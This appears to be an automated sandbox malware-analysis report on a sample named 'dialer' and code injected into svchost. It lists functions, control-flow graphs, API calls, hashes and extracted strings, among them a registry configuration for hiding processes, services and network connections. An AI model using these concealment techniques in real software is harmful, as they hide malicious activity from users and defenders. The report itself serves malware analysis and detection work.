                                                                      • Opcode Fuzzy Hash: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                                      • Instruction Fuzzy Hash: BFF05FB6608B408AEA16DF62F85179A77A5F79D7C0F009919BBC857735DB3CC1A0CB40

                                                                      Non-executed Functions

                                                                      Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 410 140002a76-140002ab8 call 140001503 call 140006620 memset 394->410 411 140002a6d 394->411 398 140002fa7-140002fe4 call 140001370 395->398 399 140002969-140002978 395->399 402 140002884-14000289b 396->402 403 1400028e8-1400028eb 396->403 400 14000284a-14000285e 397->400 407 1400029d4-140002a3e wcsncmp call 1400014e5 399->407 408 14000297a-1400029cd 399->408 400->389 400->391 405 1400028e5 402->405 406 14000289d-1400028b2 402->406 403->400 405->403 412 1400028c0-1400028c7 406->412 407->394 408->407 421 140002f39-140002f74 call 140001370 410->421 422 140002abe-140002ac5 410->422 411->410 415 1400028c9-1400028e3 412->415 416 1400028f0-1400028f9 412->416 415->405 415->412 416->400 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->398 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                      • String ID: 0$X$\BaseNamedObjects\ihmypisetxdrqeze$`
                                                                      • API String ID: 780471329-706022866
                                                                      • Opcode ID: 3921cbae5963881bc6c68f0a247accd9290a4b0d67ce47a736d6111980a1c8ca
                                                                      • Instruction ID: 658a3d460bbea879ed104d352b5e20547fe0152a80702ff4edb11cd2fd61066c
                                                                      • Opcode Fuzzy Hash: 3921cbae5963881bc6c68f0a247accd9290a4b0d67ce47a736d6111980a1c8ca
                                                                      • Instruction Fuzzy Hash: 651259B2618B8481E762CB1AF8443EAB7A4F789794F414215EBAC57BF5DF78C189C700
                                                                      Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                      • String ID:
                                                                      • API String ID: 2643109117-0
                                                                      • Opcode ID: 06f27df6a5a8c6842c0aa0926d524d878ccdae97ae67cd32ac0202430ab2861b
                                                                      • Instruction ID: 3b7c54f8824839eb892363506706b80bfa4ecf6ac178986dd5ae81438c55b813
                                                                      • Opcode Fuzzy Hash: 06f27df6a5a8c6842c0aa0926d524d878ccdae97ae67cd32ac0202430ab2861b
                                                                      • Instruction Fuzzy Hash: 3A5100F1611A4085FB16EF27F9947EA27A1BB8DBD0F449121FB4E873B2DE3884958700
                                                                      Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 510 140001cf4-140001cfe call 140001d40 503->510 511 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->511 504->505 507 140001c04 504->507 505->502 505->503 509 140001cd7-140001cf3 memcpy 507->509 515 140001d03-140001d1e call 140001d40 510->515 511->515 516 140001c72-140001c79 511->516 518 140001d23-140001d38 GetLastError call 140001d40 515->518 519 140001c7b-140001c7e 516->519 520 140001c8e-140001c97 516->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->509 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                                      APIs
                                                                      • VirtualQuery.KERNEL32(?,?,?,?,0000000140007E78,0000000140007E78,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                      • VirtualProtect.KERNEL32(?,?,?,?,0000000140007E78,0000000140007E78,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                      • memcpy.MSVCRT ref: 0000000140001CE0
                                                                      • GetLastError.KERNEL32(?,?,?,?,0000000140007E78,0000000140007E78,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                      • API String ID: 2595394609-2123141913
                                                                      • Opcode ID: c45f2e495a57a430fcf17cc5f9f7c36a08211161c8e288a1daf7c2413b0e0ff9
                                                                      • Instruction ID: 56c79c59800554f2910646d4459934fc4040430f5b8b4933bacb8507526df960
                                                                      • Opcode Fuzzy Hash: c45f2e495a57a430fcf17cc5f9f7c36a08211161c8e288a1daf7c2413b0e0ff9
                                                                      • Instruction Fuzzy Hash: 5D4132B1201A4486FA26DF57F884BE927A0F78DBC4F558126EF0E877B1DA38C586C700
                                                                      Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 533 14000220b-140002212 LeaveCriticalSection 531->533 534 14000212e-14000213c 531->534 535 140002272-140002280 532->535 536 140002223-14000222d 532->536 533->532 537 14000214d-140002159 TlsGetValue GetLastError 534->537 538 140002241-140002263 DeleteCriticalSection 536->538 539 14000222f 536->539 541 14000215b-14000215e 537->541 542 140002140-140002147 537->542 538->535 540 140002230-14000223f free 539->540 540->538 540->540 541->542 543 140002160-14000216d 541->543 542->533 542->537 543->542
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                      • String ID:
                                                                      • API String ID: 3326252324-0
                                                                      • Opcode ID: d8505fa5a18f4eabc9956257ed0cd04a762e9af97d691edbd343adb5f534fcc5
                                                                      • Instruction ID: 1c0e5bfd62e35a66f563209072fa57b55fd1b6a77dba97afdf95615a2cf2fd13
                                                                      • Opcode Fuzzy Hash: d8505fa5a18f4eabc9956257ed0cd04a762e9af97d691edbd343adb5f534fcc5
                                                                      • Instruction Fuzzy Hash: 5F21E3B0305A0192FA6BDB53F9583E82364BB6DBD0F444021FF5A476B4DB7A8986C300
                                                                      Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 556 140001f23-140001f2d 552->556 557 140001ed3-140001ee2 signal 552->557 554 140001eb5-140001eba 553->554 555 140001efb-140001f0a call 140006be0 553->555 554->548 561 140001ec0 554->561 555->556 566 140001f0c-140001f10 555->566 559 140001f43-140001f45 556->559 560 140001f2f-140001f3f 556->560 557->556 562 140001ee4-140001ee8 557->562 559->548 560->559 561->556 563 140001eea-140001ef9 signal 562->563 564 140001f4e-140001f53 562->564 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CCG
                                                                      • API String ID: 0-1584390748
                                                                      • Opcode ID: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                                      • Instruction ID: 0d0cdd76e27464eab58c3101b34b7ecc2a8ef26ebffc61dfa6a838f535d4530f
                                                                      • Opcode Fuzzy Hash: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                                      • Instruction Fuzzy Hash: 0E2159B1A0510542FA77DA2BB5903F92182ABCC7E4F258635FF19873F5DF7888C28241
                                                                      Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 583 140001a20-140001a26 580->583 584 140001956-140001961 581->584 585 14000199e-1400019a6 581->585 582->581 586 14000192b-14000193a 582->586 589 140001b87-140001b98 call 140001d40 583->589 590 140001a2c-140001a37 583->590 587 140001970-14000199c call 140001ba0 584->587 585->572 588 1400019a8-1400019c1 585->588 586->579 587->585 593 1400019df-1400019e7 588->593 590->585 594 140001a3d-140001a5f 590->594 597 1400019e9-140001a0d VirtualProtect 593->597 598 1400019d0-1400019dd 593->598 599 140001a7d-140001a97 594->599 597->598 598->572 598->593 600 140001b74-140001b82 call 140001d40 599->600 601 140001a9d-140001afa 599->601 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->585 612->599 613->609 614->600
                                                                      APIs
                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                      • API String ID: 544645111-395989641
                                                                      • Opcode ID: 49d3a49e386a9f8c188e9e2036060558ee4c7c00f715509c9333fb618cf9d003
                                                                      • Instruction ID: 0548b3f5b867e70e10a5f74b7648a1561f2d248eb850965c6f162cb2bb9ee00d
                                                                      • Opcode Fuzzy Hash: 49d3a49e386a9f8c188e9e2036060558ee4c7c00f715509c9333fb618cf9d003
                                                                      • Instruction Fuzzy Hash: DD5105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                                      Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-3474627141
                                                                      • Opcode ID: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                                      • Instruction ID: 497f2bda4b805bebb598d258fe75f44a47035596d1a2b2a7541446a23c8471c2
                                                                      • Opcode Fuzzy Hash: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                                      • Instruction Fuzzy Hash: 61F0F671A14A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C310
                                                                      Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                      • String ID:
                                                                      • API String ID: 682475483-0
                                                                      • Opcode ID: 8305f613180582c6540d5c60a31bd7587548d14b8a6b1963720f8d95c6f0d6cf
                                                                      • Instruction ID: a14c2e05b7dfa99361cb055dd0f188929d912ab55c595d3c1c1369cf37f0666f
                                                                      • Opcode Fuzzy Hash: 8305f613180582c6540d5c60a31bd7587548d14b8a6b1963720f8d95c6f0d6cf
                                                                      • Instruction Fuzzy Hash: F301B2B5305A0192FA6BDB53FE483D86364BB6CBD1F854021EF0953AB4DB7AC996C300

                                                                      Execution Graph

                                                                      Execution Coverage:56.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:87.5%
                                                                      Total number of Nodes:8
                                                                      Total number of Limit Nodes:1

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available
                                                                      callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                                      Executed Functions

                                                                      Function 00000001408460F0 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000041.00000002.2571106481.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000041.00000002.2570995936.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000041.00000002.2571106481.00000001404DC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000041.00000002.2571106481.0000000140500000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000041.00000002.2571106481.0000000140503000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000041.00000002.2571106481.000000014078B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000041.00000002.2571106481.000000014080D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000041.00000002.2573934618.0000000140847000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                      • String ID:
                                                                      • API String ID: 1941872368-0
                                                                      • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                      • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                      • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                      • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                                      Execution Graph

                                                                      Execution Coverage:0.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:66
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 14720 1fb5399273c 14722 1fb5399276a 14720->14722 14721 1fb53992858 LoadLibraryA 14721->14722 14722->14721 14723 1fb539928d4 14722->14723 14724 1fb539c1abc 14729 1fb539c1628 GetProcessHeap HeapAlloc 14724->14729 14726 1fb539c1ad2 Sleep SleepEx 14727 1fb539c1acb 14726->14727 14727->14726 14728 1fb539c1598 StrCmpIW StrCmpW 14727->14728 14728->14727 14773 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14729->14773 14731 1fb539c1650 14774 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14731->14774 14733 1fb539c1661 14775 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14733->14775 14735 1fb539c166a 14776 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14735->14776 14737 1fb539c1673 14738 1fb539c168e RegOpenKeyExW 14737->14738 14739 1fb539c18a6 14738->14739 14740 1fb539c16c0 RegOpenKeyExW 14738->14740 14739->14727 14741 1fb539c16e9 14740->14741 14742 1fb539c16ff RegOpenKeyExW 14740->14742 14777 1fb539c12bc RegQueryInfoKeyW 14741->14777 14744 1fb539c173a RegOpenKeyExW 14742->14744 14745 1fb539c1723 14742->14745 14747 1fb539c1775 RegOpenKeyExW 14744->14747 14748 1fb539c175e 14744->14748 14786 1fb539c104c RegQueryInfoKeyW 14745->14786 14752 1fb539c1799 14747->14752 14753 1fb539c17b0 RegOpenKeyExW 14747->14753 14751 1fb539c12bc 16 API calls 14748->14751 14754 1fb539c176b RegCloseKey 14751->14754 14755 1fb539c12bc 16 API calls 14752->14755 14756 1fb539c17d4 14753->14756 14757 1fb539c17eb RegOpenKeyExW 14753->14757 14754->14747 14758 1fb539c17a6 RegCloseKey 14755->14758 14759 1fb539c12bc 16 API calls 14756->14759 14760 1fb539c1826 RegOpenKeyExW 14757->14760 14761 1fb539c180f 14757->14761 14758->14753 14765 1fb539c17e1 RegCloseKey 14759->14765 14763 1fb539c184a 14760->14763 14764 1fb539c1861 RegOpenKeyExW 14760->14764 14762 1fb539c104c 6 API calls 14761->14762 14766 1fb539c181c RegCloseKey 14762->14766 14767 1fb539c104c 6 API calls 14763->14767 14768 1fb539c1885 14764->14768 14769 1fb539c189c RegCloseKey 14764->14769 14765->14757 14766->14760 14770 1fb539c1857 RegCloseKey 14767->14770 14771 1fb539c104c 6 API calls 14768->14771 14769->14739 14770->14764 14772 1fb539c1892 RegCloseKey 14771->14772 14772->14769 14773->14731 14774->14733 14775->14735 14776->14737 14778 1fb539c1327 GetProcessHeap HeapAlloc 14777->14778 14779 1fb539c148a RegCloseKey 14777->14779 14780 1fb539c1476 GetProcessHeap HeapFree 14778->14780 14781 1fb539c1352 RegEnumValueW 14778->14781 14779->14742 14780->14779 14782 1fb539c13a5 14781->14782 14782->14780 14782->14781 14784 1fb539c13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14782->14784 14785 1fb539c141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14782->14785 14791 1fb539c152c 14782->14791 14784->14785 14785->14782 14787 1fb539c11b5 RegCloseKey 14786->14787 14789 1fb539c10bf 14786->14789 14787->14744 14788 1fb539c10cf RegEnumValueW 14788->14789 14789->14787 14789->14788 14790 1fb539c114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14789->14790 14790->14789 14794 1fb539c1546 14791->14794 14795 1fb539c157c 14791->14795 14792 1fb539c1565 StrCmpW 14792->14794 14793 1fb539c155d StrCmpIW 14793->14794 14794->14792 14794->14793 14794->14795 14795->14782

                                                                      Executed Functions

                                                                      Function 000001FB539C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: 3bf4cfb0a07fb8a34a3f598bc96345aa7c46004167599278be6342a6ae7bd595
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: 4E7138B631AA5686FB109F66E8C16E923A6FB84B88F485521DE4F47B78DF3CC444C344
                                                                      Function 000001FB539C328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
